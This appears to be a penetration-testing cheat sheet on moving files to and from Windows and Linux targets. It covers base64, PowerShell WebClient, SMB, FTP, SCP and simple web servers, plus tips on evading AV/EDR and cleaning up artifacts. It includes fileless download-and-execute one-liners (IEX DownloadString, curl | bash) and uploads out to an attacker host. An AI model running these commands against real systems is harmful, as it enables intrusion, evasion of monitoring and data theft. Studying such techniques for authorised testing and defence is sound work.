File Transfer Techniques for Pentesting

Overview

File transfer techniques are critical for penetration testing, especially in restricted environments. This guide covers both Windows and Linux methods, with practical commands and methodologies.

Common Challenges

  • Host-based Controls

    • Application whitelisting

    • AV/EDR blocking

    • Process monitoring

  • Network Controls

    • Firewall restrictions

    • IDS/IPS monitoring

    • Port filtering

Windows Transfer Techniques

PowerShell Methods

Base64 Transfer (No Network Required)

# On Attacker (Linux)
cat file | base64 -w 0

# On Target (Windows)
[IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("<base64_string>"))

# Verify Transfer
Get-FileHash C:\path\to\file -Algorithm MD5

Web Downloads

# Method 1: WebClient
(New-Object Net.WebClient).DownloadFile('<URL>', 'C:\path\to\outputfile')

# Method 2: Fileless Execution
IEX (New-Object Net.WebClient).DownloadString('<URL>')

# Method 3: Invoke-WebRequest
Invoke-WebRequest <URL> -UseBasicParsing -OutFile <outputfile>

SMB Transfer

# On Attacker: Start SMB Server
sudo impacket-smbserver share /tmp/smbshare -smb2support

# On Target: Copy File
copy \\<Attacker_IP>\share\file.exe

# Authenticated SMB
sudo impacket-smbserver share /tmp/smbshare -smb2support -user test -password test
net use Z: \\<Attacker_IP>\share /user:test test

FTP Transfer

# On Attacker: Start FTP Server
sudo python3 -m pyftpdlib --port 21 --write

# On Target: Download
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\path\to\outputfile')

# On Target: Upload
(New-Object Net.WebClient).UploadFile('ftp://<IP>/file', 'C:\path\to\file')

Living Off The Land (LOtL) Binaries

  • WMIC

  • Bitsadmin

  • Certutil

  • Regsvr32

Linux Transfer Techniques

Base64 Transfer

# Encode
cat file | base64 -w 0; echo

# Decode
echo -n '<base64_string>' | base64 -d > file

# Verify
md5sum file

Web Transfer Methods

Download

# Wget
wget <URL> -O /path/to/file

# cURL
curl -o /path/to/file <URL>

# Fileless Execution
curl <URL> | bash
wget -qO- <URL> | python3

Upload

# cURL POST
curl -X POST https://<IP>/upload -F 'files=@/path/to/file' --insecure

# Start Python Upload Server
sudo python3 -m pip install uploadserver
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

SSH/SCP Transfer

# Start SSH Service
sudo systemctl enable ssh
sudo systemctl start ssh

# Download
scp username@<IP>:/remote/file /local/directory

# Upload
scp /local/file username@<IP>:/remote/directory

Simple Web Server

# Python3
python3 -m http.server

# PHP
php -S 0.0.0.0:8000

Common Issues & Solutions

SSL/TLS Issues (Windows)

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Port Considerations

  • HTTP/HTTPS (80/443) - Usually allowed

  • SMB (445) - Often blocked

  • FTP (20/21) - May be filtered

  • SSH/SCP (22) - May require configuration

Security Best Practices

  1. Transfer Verification

    • Always verify file integrity (MD5/SHA)

    • Check file permissions after transfer

  2. Operational Security

    • Clean up temporary files

    • Remove credentials after use

    • Monitor for security alerts

    • Use encryption when possible

  3. Fileless Operations

    • Prefer memory-only operations

    • Clean up artifacts

    • Be aware of logging/monitoring

  4. Network Security

    • Use HTTPS/FTPS when available

    • Consider file size limitations

    • Monitor for AV/EDR alerts